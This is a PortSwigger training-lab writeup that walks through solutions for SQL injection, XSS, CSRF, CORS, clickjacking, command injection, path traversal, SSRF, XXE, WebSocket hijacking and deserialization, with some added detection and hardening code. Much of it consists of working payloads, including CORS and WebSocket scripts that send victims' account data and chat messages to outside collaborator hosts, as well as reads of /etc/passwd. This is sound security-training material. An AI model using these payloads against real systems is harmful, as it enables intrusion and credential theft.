# PortSwigger Labs VCS Training Writeup
## SQL Injection [11/18]
### **[APPRENTICE] Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data**

We can try injecting SQL into the `category` parameter with a basic payload, in this case `' OR 1=1 --` (the leading quote closes the original string literal).
Imagine the server's search query is as follows:
`SELECT * FROM products WHERE category = 'Accessories'`
The query now becomes `SELECT * FROM products WHERE category = '' OR 1=1 --`, which returns every product: `OR 1=1` is always true, and `--` comments out the rest of the original query.

<br>
### **[APPRENTICE] Lab: SQL injection vulnerability allowing login bypass**

<br>
Login page

Server query could be similar to this:
`SELECT * FROM users WHERE user = 'administrator' AND password = 'password'`

Apply the payload `' OR 1=1 --` in the password field.
<br>

Success.
<br>
### **[PRACTITIONER] Lab: SQL injection attack, querying the database type and version on Oracle**


Again we inject SQL into the `category` parameter. Since this is a `UNION` attack, the first step is to determine the number of columns the original query returns.
<br>

The version string is exposed through `v$version`.
<br>

We conclude that the query returns 2 columns. Now retrieve the data with the payload: `'+UNION+SELECT+BANNER,NULL+FROM+V$VERSION+--`

<br>
### **[PRACTITIONER] Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft**
Using the same enumeration method as above.

<br>
### **[PRACTITIONER] Lab: SQL injection attack, listing the database contents on non-Oracle databases**
Test with payload `' UNION SELECT '1','2' FROM information_schema.tables --`.

<br>
Dump all table names:
`'+UNION+SELECT+table_name,NULL+FROM+information_schema.tables+--`

<br>
We find a suspicious table, `users_jvktfa`.
Payload to dump its data: `' UNION SELECT * FROM users_jvktfa--`

Administrator credentials attained!!
<br>
### **[PRACTITIONER] Lab: SQL injection attack, listing the database contents on Oracle**
Payload: `' UNION SELECT 'a','b' FROM dual--`

The query returns 2 columns.
<br>
Payload: `'+UNION+SELECT+table_name,NULL+FROM+all_tables--`

That lists all table names.
Payload: `' UNION SELECT * FROM USERS_GWBTSX--`

Administrator's credentials attained.
<br>
### **[PRACTITIONER] Lab: SQL injection UNION attack, determining the number of columns returned by the query**
Simply keep inserting `NULL` values until the query returns no error.

This means the query returns 3 columns.
<br>
### **[PRACTITIONER] Lab: SQL injection UNION attack, finding a column containing text**
Enumerate number of columns with payload: `' UNION SELECT NULL,NULL,NULL--`

The query returns 3 columns.<br>
Now fuzz the columns for one that accepts text, using the method hinted by PortSwigger.

<br>
`' UNION SELECT NULL,'a',NULL--` returns no error, which means the second column is string-compatible.
<br>
Now replace 'a' with 'c1pXgI' to solve the lab.

<br>
### **[PRACTITIONER] Lab: SQL injection UNION attack, retrieving data from other tables**

As the lab description states, we need to retrieve data from the `users` table, which has two columns, `username` and `password`.
<br>
Payload: `' UNION SELECT username,password FROM users--`

<br>
### **[PRACTITIONER] Lab: SQL injection UNION attack, retrieving multiple values in a single column**
`' UNION SELECT NULL,'a'--`
This means the second column is string-compatible.
<br>

<br>
`' UNION SELECT NULL,username || ' ' || password FROM users--`

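As an added example (not part of the original writeup), the following detector flags the payload shapes used across the SQL injection labs above when they appear in web-server access logs; the log lines are constructed, the request paths reuse the labs' own payloads in URL-encoded form, and the indicator names are this example's own:

```javascript
// Added example (not from the original writeup): flag the SQL injection patterns
// used in the labs above when they show up in web-server access logs.
// The log lines below are constructed for this example; their query strings reuse
// the labs' own payloads in URL-encoded form.
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /filter?category=Accessories HTTP/1.1" 200 5120',
  '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /filter?category=%27+OR+1%3D1+-- HTTP/1.1" 200 18233',
  '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /filter?category=%27+UNION+SELECT+BANNER,NULL+FROM+V$VERSION+-- HTTP/1.1" 200 6010',
  '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /filter?category=%27+UNION+SELECT+table_name,NULL+FROM+information_schema.tables+-- HTTP/1.1" 200 9001',
  '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /filter?category=%27+UNION+SELECT+NULL,username+%7C%7C+%27+%27+%7C%7C+password+FROM+users-- HTTP/1.1" 200 7000',
  '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /product?productId=3 HTTP/1.1" 200 4000',
];

// Each indicator corresponds to a pattern the labs above rely on. They are matched
// against the URL-decoded query string, never the raw one, so percent-encoding or
// '+' for spaces cannot hide a payload.
const INDICATORS = {
  tautology: /'\s*(?:or|and)\s+\d+\s*=\s*\d+/i,                        // ' OR 1=1
  union: /\bunion\s+(?:all\s+)?select\b/i,                             // ' UNION SELECT ...
  metadata: /\b(?:information_schema|v\$version|all_tables|dual)\b/i, // schema/version sources
  comment: /--\s*$/,                                                   // trailing -- terminator
  concat: /\|\|/,                                                      // username || ' ' || password
};

// Decode a query string the way the server would: '+' is a space, then
// percent-decode once. Malformed sequences fall back to the spaced raw text.
function decodeQuery(qs) {
  const spaced = qs.replace(/\+/g, ' ');
  try { return decodeURIComponent(spaced); } catch (e) { return spaced; }
}

// Pull the request target (path + query) out of a common-log-format line.
function requestTarget(line) {
  const m = /"(?:GET|POST|PUT|DELETE) (\S+) HTTP\//.exec(line);
  return m ? m[1] : null;
}

// Return the indicator names that fire for one request target.
function classifyTarget(target) {
  const q = target.indexOf('?');
  if (q < 0) return [];
  const decoded = decodeQuery(target.slice(q + 1));
  return Object.keys(INDICATORS).filter((name) => INDICATORS[name].test(decoded));
}

// Scan a whole log; only suspicious lines are returned, each with its hits.
function scanLog(lines) {
  const findings = [];
  lines.forEach((line, idx) => {
    const target = requestTarget(line);
    if (!target) return;
    const hits = classifyTarget(target);
    if (hits.length) findings.push({ lineNo: idx + 1, target, hits });
  });
  return findings;
}

for (const f of scanLog(SAMPLE_LOG)) {
  console.log(`line ${f.lineNo}: ${f.hits.join(', ')} -> ${f.target}`);
}
```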
<br>
### **[PRACTITIONER] Lab: Blind SQL injection with conditional responses**
## Cross-site scripting
### **[APPRENTICE] Lab: Reflected XSS into HTML context with nothing encoded**

<br>
### **[APPRENTICE] Lab: Stored XSS into HTML context with nothing encoded**

<br>
### **[APPRENTICE] Lab: DOM XSS in document.write sink using source location.search**

<br>

Inspecting the page source reveals the search function.
The search query is written inside an `<img>` tag:
```htmlembedded
<img src="/resources/images/tracker.gif?searchTerms='+query+'">
```
We add `">` to close the `src` attribute and the `img` tag, then append whatever we like to trigger the XSS.
<br>
This payload works for this example.
```htmlmixed
"><image/src/onerror=prompt(8)>
```
<br>
### **[APPRENTICE] Lab: DOM XSS in innerHTML sink using source location.search**
<br>
A payload like `<script>alert("dak dak buh buh lmao")</script>` won't be executed, because `<script>` elements inserted through `innerHTML` are not run.

Instead, we trigger an error event and let the browser execute its handler. In this case
`<image/src/onerror=prompt(8)>` works.

<br>
### **[APPRENTICE] Lab: DOM XSS in jQuery anchor href attribute sink using location.search source**

Source code of the `Back` button.
The page sets the link's `href` with jQuery's `attr()` from a URL parameter, which means we control the value written into the DOM. Change the `returnPath` URL parameter to `javascript:alert(document.domain)`, then click the `Back` button to execute the script.

<br>
### **[APPRENTICE] Lab: Reflected XSS into attribute with angle brackets HTML-encoded**
The search query is inserted into the `value` attribute, so we break out of it with
`bruh" onmouseover="alert(1)`.
- `bruh"` closes the `value` attribute
- `onmouseover="alert(1)` adds an event handler (the page's own closing quote completes it) that fires when we hover over the search box

<br>
Reload the page for the payload to take effect.

<br>
### **[APPRENTICE] Lab: Stored XSS into anchor href attribute with double quotes HTML-encoded**

The author's website is placed in the anchor's `href` attribute. Supply a `javascript:` URL as the website instead.

<br>

Clicking the author's name now triggers the script.

<br>
### **[APPRENTICE] Lab: Reflected XSS into a JavaScript string with angle brackets HTML encoded**

The search query is automatically URL-encoded, except:

Payload: `'*alert(1)*'`

<br>
### **[PRACTITIONER] Lab: DOM XSS in document.write sink using source location.search inside a select element**
Focus on the store display script.

We'll want to exploit the `document.write()` function.
`document.write('<select name="storeId">');`
Payload:
```htmlembedded
"></select><img src=1 onerror=alert(1)>
```
Explanation:
First, close the `<select>` tag's attribute and element with `"></select>`.
Then trigger the XSS with `<img src=1 onerror=alert(1)>`.
The resulting call is `document.write('<select name=""></select><img src=1 onerror=alert(1)>">')`.

<br>
### **[PRACTITIONER] Lab: DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded**
Based on a StackOverflow answer:

<br>
### **[PRACTITIONER] Lab: Stored DOM XSS**
Take a look at `escapeHTML()` function.

In JS, `replace()` with a string pattern replaces only the first occurrence of that character.
Truly one of the JS moments :rolling_on_the_floor_laughing:.

We can exploit this by using: `<><img src=69 onerror=alert(1)>`.
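To show the defect and its fix side by side, here is an added example (not the lab's code): an `escapeHTML()` built on string-pattern `replace()`, mirroring the flaw described above, next to a corrected version, both run on the payload above; the function and constant names are this example's own:

```javascript
// Added example (not the lab's code): a string-pattern replace() escaper beside a fixed one.
function escapeHtmlBroken(html) {
  // String patterns replace only the FIRST match, so a second '<' survives untouched.
  return html.replace('<', '&lt;').replace('>', '&gt;');
}

// Fixed: a global regex (replaceAll would do too) covers every occurrence, and the other
// characters that matter in HTML text and attribute contexts are escaped as well.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtmlFixed(html) {
  return String(html).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Check used below: does any tag opener survive in the escaper's output?
function containsTagOpener(s) {
  return /<[a-zA-Z!\/]/.test(s);
}

// The writeup's payload: the leading '<>' pair absorbs the single replace() of each character,
// so the <img> that follows reaches the DOM intact.
const LAB_PAYLOAD = '<><img src=69 onerror=alert(1)>';

console.log(escapeHtmlBroken(LAB_PAYLOAD)); // &lt;&gt;<img src=69 onerror=alert(1)>
console.log(escapeHtmlFixed(LAB_PAYLOAD));  // &lt;&gt;&lt;img src=69 onerror=alert(1)&gt;
```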

<br>
## Cross-site request forgery (CSRF) [3/12]
### **[APPRENTICE] Lab: CSRF vulnerability with no defenses**
Exploit code:
```htmlembedded
<form method="POST" action="https://0a4700f7047873e18198f220001900a9.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="nano@nichijou">
</form>
<script>
document.forms[0].submit();
</script>
```

<br>
### **[PRACTITIONER] Lab: CSRF where token validation depends on request method**
```htmlembedded
<form action="https://0ade00df03a844fe8045b251007a009c.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="hehe@xd">
</form>
<script>
document.forms[0].submit();
</script>
```

<br>
### **[PRACTITIONER] Lab: CSRF where token validation depends on token being present**
Exploit code
```htmlembedded
<form method="POST" action="https://0aa300c80496330d82c8ed0f002600cc.web-security-academy.net/my-account/change-email">
<input type="hidden" name="$param1name" value="$param1value">
</form>
<script>
document.forms[0].submit();
</script>
```
## DOM-based vulnerabilities [5/7]
### **[PRACTITIONER] Lab: DOM XSS using web messages**
The site has an odd `[object Object]` at the top.

<br>
Attached to it is a script that uses `addEventListener` to receive messages posted to the window and then writes the message into a DOM element.

No sanitization is applied; the message is used raw.
<br>
Payload: `<iframe src="https://0a1a006a03ac999385f3f61000140089.web-security-academy.net/" onload="contentWindow.postMessage('<img src=1 onerror=print()>', 'https://0a1a006a03ac999385f3f61000140089.web-security-academy.net')">`
We use an `<iframe>` to embed the target page (simply because `<script>` does not work :v); its `onload` handler then posts the payload into the frame with `contentWindow.postMessage()`.

`<img src=1 onerror=print()>` will fail to load properly, and trigger `onerror`.

<br>
### **[PRACTITIONER] Lab: DOM XSS using web messages and a JavaScript URL**
This script listens for incoming messages and, if the message contains a URL, navigates the page to it.

It does not check that the value is a valid URL; it only looks for the substring `http:`, which is why the payload ends in `//http:`.
Payload: `<iframe src="https://0a0100f30473050580190d630015003f.web-security-academy.net/" onload="contentWindow.postMessage('javascript:print()//http:', 'https://0a0100f30473050580190d630015003f.web-security-academy.net/')">`

<br>
### **[PRACTITIONER] Lab: DOM XSS using web messages and `JSON.parse`**
The page listens for messages; each message is a JSON string, which is parsed with `JSON.parse` and passed to a `switch` statement.

What we want to do here is to inject JS into `d.url`, as it is the only injectable parameter.
Payload: `<iframe src=https://0af400f2041a195c8018089000010028.web-security-academy.net/ onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}","*")'>`
`d.url` is used in the `load-channel` case, hence `"type": "load-channel"`, and `url` carries our payload: `"url": "javascript:print()"`.
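The three web-message labs above share one root cause: the listener trusts whatever arrives. The following added example (not the labs' code) is a hardened handler that checks `event.origin` against an allowlist, parses the message as JSON, rejects non-http(s) URLs and writes with `textContent`; the allowlisted origin `https://app.example` is hypothetical, and the event and element are plain objects so it runs in Node without a DOM:

```javascript
// Added example (not the labs' code): a window-message handler that closes the three
// holes exploited above: no origin check, innerHTML on raw data, and a URL check that
// only looks for the substring 'http:'. TRUSTED_ORIGINS is a hypothetical allowlist.
const TRUSTED_ORIGINS = new Set(['https://app.example']);

// Only http(s) URLs may be navigated to. 'javascript:print()//http:' parses with the
// scheme 'javascript:', so it is rejected even though it contains 'http:'.
function safeNavigationUrl(candidate) {
  if (typeof candidate !== 'string') return null;
  let parsed;
  try { parsed = new URL(candidate); } catch (e) { return null; }
  return parsed.protocol === 'https:' || parsed.protocol === 'http:' ? parsed.href : null;
}

// Returns a record of what would happen instead of touching the page, so it can be tested.
function handleMessage(event, element) {
  // 1. Origin check: a message posted from an attacker's frame is dropped here.
  if (!TRUSTED_ORIGINS.has(event.origin)) return { action: 'ignored', reason: 'untrusted origin' };
  if (typeof event.data !== 'string') return { action: 'ignored', reason: 'non-string data' };
  // 2. Structured data: parse as JSON and dispatch on a known type, nothing else.
  let msg;
  try { msg = JSON.parse(event.data); } catch (e) { return { action: 'ignored', reason: 'not JSON' }; }
  if (!msg || typeof msg !== 'object') return { action: 'ignored', reason: 'not an object' };
  switch (msg.type) {
    case 'load-channel': {
      const url = safeNavigationUrl(msg.url);
      return url ? { action: 'navigate', url } : { action: 'ignored', reason: 'bad url' };
    }
    case 'status': {
      if (typeof msg.text !== 'string') return { action: 'ignored', reason: 'bad text' };
      // 3. textContent never parses markup, so '<img src=1 onerror=...>' stays inert text.
      element.textContent = msg.text;
      return { action: 'render', text: msg.text };
    }
    default:
      return { action: 'ignored', reason: 'unknown type' };
  }
}

// In a real page (browser only) the wiring would be:
// window.addEventListener('message', (e) => handleMessage(e, statusElement));
```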

<br>
### **[PRACTITIONER] Lab: DOM-based open redirection**

The page has a `url` parameter that controls a redirect, so we can point it at any URL we control.
Payload: `https://0a9000af03da63e88477b8f60051000d.web-security-academy.net/post?postId=8&url=https://exploit-0aa3000103966328849fb70901270077.exploit-server.net/`

<br>
### **[PRACTITIONER] Lab: DOM-based cookie manipulation**
Exploit script:
```htmlembedded
<iframe src="https://0a6b008303233e1c808562ec00b40033.web-security-academy.net/product?productId=1&'><script>print()</script>" onload="if(!window.x)this.src='https://0a6b008303233e1c808562ec00b40033.web-security-academy.net';window.x=1;">
```
<br>
## Cross-origin resource sharing (CORS) [3/4]
### **[APPRENTICE] Lab: CORS vulnerability with basic origin reflection**
Exploit:
```htmlembedded
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get', 'https://0abf00f4030143e080d0fd63000900de.web-security-academy.net/accountDetails', true);
req.withCredentials = true;
req.send();
function reqListener() {
    location = '/log?key=' + this.responseText;
};
</script>
```

Click on `Deliver exploit to victim`.
<br>

Data recorded in access log.
<br>
### **[APPRENTICE] Lab: CORS vulnerability with trusted null origin**
Exploit script:
```htmlembedded
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get', 'https://0a1e000804a681e081cc523c004b001e.web-security-academy.net/accountDetails', true);
req.withCredentials = true;
req.send();
function reqListener() {
    location = 'https://exploit-0a0b00ce040b810281ad51d001f00007.exploit-server.net//log?key=' + encodeURIComponent(this.responseText);
};
</script>"></iframe>
```
<br>
Click on `Deliver exploit to victim`.

<br>
### **[PRACTITIONER] Lab: CORS vulnerability with trusted insecure protocols**
Exploit script
```htmlembedded
<script>
document.location="https://stock.0a000093048cd5c884b10f82009e00ff.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0a000093048cd5c884b10f82009e00ff.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0a69004b04eed56d846c0ed301dd000d.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
```
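The three CORS labs above correspond to three server-side mistakes: reflecting `Origin`, trusting `null`, and trusting plain-http subdomains. This added example (not the labs' code) shows the reflecting policy beside an exact-match allowlist policy, together with a simplified model of the browser's rule for exposing credentialed responses; the allowlisted origins are hypothetical:

```javascript
// Added example (not the labs' code): which Access-Control-Allow-Origin to send back.
// ALLOWED_ORIGINS is a hypothetical allowlist for this example.
const ALLOWED_ORIGINS = new Set(['https://app.example', 'https://admin.app.example']);

// Vulnerable policy (first lab): echo whatever Origin the request carries.
function reflectingCorsHeaders(requestOrigin) {
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened policy: exact-match allowlist on scheme + host + port.
function allowlistCorsHeaders(requestOrigin) {
  if (typeof requestOrigin !== 'string') return {};   // no Origin header: not a CORS request
  if (requestOrigin === 'null') return {};            // second lab: sandboxed iframes send 'null'
  let parsed;
  try { parsed = new URL(requestOrigin); } catch (e) { return {}; }
  if (parsed.protocol !== 'https:') return {};        // third lab: http:// siblings are not trusted
  // parsed.origin is the normalised scheme://host[:port]; comparing it back to the raw
  // header also rejects anything carrying a path, trailing slash or userinfo.
  if (parsed.origin !== requestOrigin || !ALLOWED_ORIGINS.has(parsed.origin)) return {};
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',                                   // keep caches from serving one origin's reply to another
  };
}

// Simplified browser rule for a credentialed (withCredentials) request: the body is
// readable only when ACAO equals the page's origin exactly and ACAC is 'true'.
function browserExposesResponse(responseHeaders, pageOrigin) {
  return responseHeaders['Access-Control-Allow-Origin'] === pageOrigin &&
         responseHeaders['Access-Control-Allow-Credentials'] === 'true';
}

const ATTACKER = 'https://exploit.example';
console.log('reflecting policy leaks to attacker:', browserExposesResponse(reflectingCorsHeaders(ATTACKER), ATTACKER));
console.log('allowlist policy leaks to attacker:', browserExposesResponse(allowlistCorsHeaders(ATTACKER), ATTACKER));
```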
## Clickjacking [3/5]
### **[APPRENTICE] Lab: Basic clickjacking with CSRF token protection**
Exploit script:
```htmlembedded
<style>
iframe {
    position: relative;
    width: 1000px;
    height: 700px;
    opacity: 0.00001;
    z-index: 2;
}
div {
    position: absolute;
    top: 515px;
    left: 60px;
    z-index: 1;
}
</style>
<div>CLICK ME PRETTY PLSS</div>
<iframe src="https://0ae900940450a3ec80a108460070008f.web-security-academy.net/my-account"></iframe>
```
<br>
### **[APPRENTICE] Lab: Clickjacking with form input data prefilled from a URL parameter**
Exploit code:
```htmlembedded
<style>
iframe {
    position: relative;
    width: 1000px;
    height: 700px;
    opacity: 0.0001;
    z-index: 2;
}
div {
    position: absolute;
    top: 400px;
    left: 80px;
    z-index: 1;
}
</style>
<div>CLICK ME PLSSSSSSSSSS</div>
<iframe src="https://0a62000f04e85cce8976b80b00710048.web-security-academy.net/my-account?email=hacker@attacker-website.com"></iframe>
```
<br>
### **[PRACTITIONER] Exploiting clickjacking vulnerability to trigger DOM-based XSS**
Exploit code:
```htmlembedded
<style>
iframe {
    position: relative;
    width: 500px;
    height: 700px;
    opacity: 0.00001;
    z-index: 2;
}
div {
    position: absolute;
    top: 610px;
    left: 80px;
    z-index: 1;
}
</style>
<div>Test me</div>
<iframe src="https://0ad90041047b86c483f9bf5200690090.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=hacker@attacker-website.com&subject=test&message=test#feedbackResult"></iframe>
```
## OS command injection [4/5]
### **[APPRENTICE] Lab: OS command injection, simple case**
Append `;whoami` to the `storeId` parameter.
Payload: `https://0adc006c03b2e76783c2936e00db00b6.web-security-academy.net/product?productId=3&storeId=1;whoami`

<br>
### **[PRACTITIONER] Lab: Blind OS command injection with time delays**
Open Burp Suite and intercept the form submission.

Appending `||sleep+10||` to any of the parameters works.

<br>
### **[PRACTITIONER] Lab: Blind OS command injection with output redirection**

<br>
### **[PRACTITIONER] Lab: Blind OS command injection with out-of-band interaction**

<br>
## Path traversal [6/6]
### **[APPRENTICE] Lab: File path traversal, simple case**
Payload: `../../../etc/passwd`
Inject payload via `?filename` parameter.

<br>
### **[PRACTITIONER] Lab: File path traversal, traversal sequences blocked with absolute path bypass**
Read file using absolute path: `/etc/passwd`

<br>
### **[PRACTITIONER] Lab: File path traversal, traversal sequences stripped non-recursively**
Payload: `....//....//....//etc/passwd`
No source code is provided, so we assume the site sanitizes path traversal by stripping `../` sequences. The stripping is non-recursive (a single pass), so `....//` is reduced to `../` once the inner `../` has been removed.

<br>
### **[PRACTITIONER] Lab: File path traversal, traversal sequences stripped with superfluous URL-decode**
The common payload for URL-encoded path traversal uses `%2f`. However, it does not work this time; I assume the backend recursively decodes the URL, so we need to double-encode the slash as `%252f`.
Payload: `..%252f..%252f..%252fetc/passwd`

<br>
### **[PRACTITIONER] Lab: File path traversal, validation of start of path**
Payload: `/var/www/images/../../../etc/passwd`
Any requested path that does not start with `/var/www/images/` is refused, so we begin with that prefix and traverse back out to the desired file with `..`.

<br>
### **[PRACTITIONER] Lab: File path traversal, validation of file extension with null byte bypass**

Source: https://www.thehacker.recipes/web/inputs/null-byte-injection
Payload: `../../../../etc/passwd%00.png`

<br>
## Access control vulnerabilities [7/13]
### **[APPRENTICE] Lab: Unprotected admin functionality**

dirsearch reveals a `robots.txt` file.

Hidden admin panel.

Click `Delete` to finish.

<br>
### **[APPRENTICE] Lab: Unprotected admin functionality with unpredictable URL**
Page source contains path to admin panel.

<br>
### **[APPRENTICE] Lab: User role controlled by request parameter**

Change `Admin` value to `true`.

Logged in!

<br>
### **[APPRENTICE] Lab: User role can be modified in user profile**
Log in as `wiener` user.

Intercept the email change request and add `roleid` to the JSON body.

Go back to the admin panel and delete user `carlos`.
<br>
### **[APPRENTICE] Lab: User ID controlled by request parameter**
Log in as the `wiener` user.

<br>
Notice that the account is selected by the `id` parameter, which we can change.

<br>
Change id to `carlos`.

API key retrieved.
### **[APPRENTICE] Lab: User ID controlled by request parameter, with unpredictable user IDs**
User IDs are randomly generated and unpredictable.

<br>
Back on the home page, find a blog post by carlos.

<br>
Leaked user id.

<br>
Logged in.

<br>
### **[APPRENTICE] Lab: Insecure direct object references**
Vulnerability is in live chat feature.

<br>

We exploit the IDOR by changing the transcript file name to `1.txt`: the transcripts we can download are numbered from 2 upward, so `1.txt` is the hidden one.

<br>

We successfully leaked other people's transcript.

<br>
## File upload vulnerabilities [2/7]
### **[APPRENTICE] Lab: Remote code execution via web shell upload**
We can achieve RCE through the avatar upload feature.

<br>
Craft a simple web shell.

<br>

Upload success.
Avatars are served from `/files/avatars/`; browse there to find our web shell, which takes its command from the `c` parameter.
Try executing `whoami`.

The goal of this lab is to read carlos' secret at `/home/carlos/secret`.

<br>
### **[APPRENTICE] Lab: Web shell upload via Content-Type restriction bypass**
As in the previous lab we can upload files, but only JPEG and PNG are accepted.

<br>

Uploads are filtered on the `Content-Type` header to accept images only.
We bypass this by changing `application/octet-stream` to `image/png` in the intercepted request.

<br>
## Information disclosure [4/5]
### **[APPRENTICE] Lab: Information disclosure in error messages**
Change `productId` to `'` and observe the error.

### **[APPRENTICE] Lab: Information disclosure on debug page**
Debug page is at `/cgi-bin/phpinfo.php`.

<br>
### **[APPRENTICE] Lab: Source code disclosure via backup files**
First, I checked `robots.txt` for any information.

It lists a `/backup` directory.

Inside is a backup file, `ProductTemplate.java.bak`.

<br>
Credentials are hard-coded into the source code.

<br>
### **[PRACTITIONER] Lab: Information disclosure in version control history**
Lab name implies existence of `.git` (or `.hg`). I tried with `.git` and it worked.

<br>
## Business logic vulnerabilities [4/11]
### **[APPRENTICE] Lab: Excessive trust in client-side controls**

Intercept the add-to-cart request; notice that we can change the item price.

Edit `price` to 1.

<br>
### **[APPRENTICE] Lab: High-level logic vulnerability**
Notice we can control the `quantity` value to lower the total price. E.g.:

Change `quantity` to a negative value.

The total price drops below $100, so we can afford the purchase.

<br>
### **[APPRENTICE] Lab: Inconsistent security controls**
Dirsearch reveals an `/admin` panel, but it can only be accessed with a `@dontwannacry.com` email.

<br>
The email can be changed on the `My account` page.

<br>
Now we're authorized to access the admin panel.

<br>
### **[APPRENTICE] Lab: Flawed enforcement of business rules**
A newly registered account can use this code at checkout.

<br>
Signing up for the newsletter also gives us a coupon.


<br>
Apparently, applying the same code twice in a row is not allowed (source: trust me bro :D), so we abuse the coupon system by alternating between the two coupons.

<br>
## NoSQL injection [2/4]
### **[APPRENTICE] Lab: Detecting NoSQL injection**
The NoSQL database is most likely MongoDB; we can bypass the filter by injecting an expression that always evaluates to true.
Payload: `Accessories'||1||'`

<br>
### **[APPRENTICE] Lab: Exploiting NoSQL operator injection to bypass authentication**
Intercepting the login process.

<br>
Assuming the admin account name starts with `ad`, we can use a regex match (`ad.*`) on the username to match the admin account.

<br>
## Server-side request forgery (SSRF) [5/7]
### **[APPRENTICE] Lab: Basic SSRF against the local server**
Intercept `checkStock` request.

<br>
Change the `stockApi` value to `http://localhost/admin`.


<br>
Delete user `carlos` with `http://localhost/admin/delete?username=carlos`
<br>
### **[APPRENTICE] Lab: Basic SSRF against another back-end system**
Intercept `Check stock`, send to `Intruder`.

<br>
Select payload, then start attack.

<br>
Payload `248` revealed an admin panel.

<br>
Send request to `Repeater`, append `/admin/delete?username=carlos` to `stockApi`'s value.

<br>
### **[PRACTITIONER] Lab: Blind SSRF with out-of-band detection**
Visit product, intercept and send to `Repeater`.

<br>
Insert Collaborator Payload.

<br>

Click `Send`.
Go to `Collaborator` tab, click `Poll now`.

<br>
### **[PRACTITIONER] Lab: SSRF with blacklist-based input filter**
Intercept `Check stock` and send to `Repeater`.
Change the `stockApi` value to `http://127.1/%2561dmin` (`127.1` is a short form of `127.0.0.1`, and `%2561` is a double-URL-encoded `a`, so the blacklist's `admin` check does not match).

<br>
Now we can view the admin panel. Delete user `carlos` with `http://127.1/%2561dmin/delete?username=carlos`

<br>
### **[PRACTITIONER] Lab: SSRF with filter bypass via open redirection vulnerability**
Intercept `Check stock`.

<br>
## XML external entity (XXE) injection [7/9]
### **[APPRENTICE] Lab: Exploiting XXE using external entities to retrieve files**
Source: https://github.com/payloadbox/xxe-injection-payload-list

<br>
### **[APPRENTICE] Lab: Exploiting XXE to perform SSRF attacks**

<br>
This leaks information, in this case a folder name.

<br>
### **[PRACTITIONER] Lab: Blind XXE with out-of-band interaction**
This lab requires Burp Collaborator.
Add entity to XML data:
`<!DOCTYPE stockCheck [ <!ENTITY ent SYSTEM "http://wnnjg11iyi477u7pxf9gmjcv4mady3ms.oastify.com"> ]>`

<br>
### **[PRACTITIONER] Lab: Blind XXE with out-of-band interaction via XML parameter entities**

<br>
Payload: `<!DOCTYPE test [<!ENTITY % test SYSTEM "https://5ekkoo5zy1xbnf7bs3oh1akmadg44ysn.oastify.com"> %test; ]>`

<br>
### **[PRACTITIONER] Lab: Exploiting XInclude to retrieve files**
Capture the `POST` request sent by the check stock button and replace the `productId` value with:
`<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>`

<br>
### **[PRACTITIONER] Lab: Exploiting XXE via image file upload**
Create an SVG as follows:
`<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>`

Open any post and, in the comment form, choose the `.svg` file we created earlier as the avatar.
<br>
Back in the post's comment section, the file's contents are now rendered in your avatar.

<br>
## WebSockets [3/3]
### **[APPRENTICE] Lab: Manipulating WebSocket messages to exploit vulnerabilities**
Intercept message.

<br>
Edit message with `<img src=1 onerror='alert(1)'>`, click `Forward`.

<br>
### **[PRACTITIONER] Lab: Cross-site WebSocket hijacking**
Exploit script:
```htmlembedded
<script>
var ws = new WebSocket('wss://0ade00510485f9e3836615940068004d.web-security-academy.net/chat');
ws.onopen = function() {
    ws.send("READY");
};
ws.onmessage = function(event) {
    fetch('https://d9nsjw07t9sjin2jnbjpwifu5lbez4nt.oastify.com', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>
```
Go to the `Collaborator` tab and click `Poll now`.

Search through the captured chat messages to find the password.
<br>
### **[PRACTITIONER] Lab: Manipulating the WebSocket handshake to exploit vulnerabilities**
Use `X-Forwarded-For: 1.1.1.1` to spoof IP.

<br>
Obfuscate payload.

<br>
## Insecure deserialization [/10]
### **[APPRENTICE] Lab: Modifying serialized objects**
Log in and decode the cookie.

<br>
Change `b:0` to `b:1`, then encode cookie again.

<br>
Replace cookie.

<br>
### **[PRACTITIONER] Lab: Modifying serialized data types**
Base64-decode the existing cookie and modify it as follows:
`O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}`
Then base64-encode it again.
New cookie: `Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjEzOiJhZG1pbmlzdHJhdG9yIjtzOjEyOiJhY2Nlc3NfdG9rZW4iO2k6MDt9Cg%3d%3d`.
Replace the cookie and reload the page. Changing `access_token` from a string to the integer `0` works because PHP 7's loose comparison treats `0 == "<any non-numeric string>"` as true, so the token check passes without knowing the real token.

<br>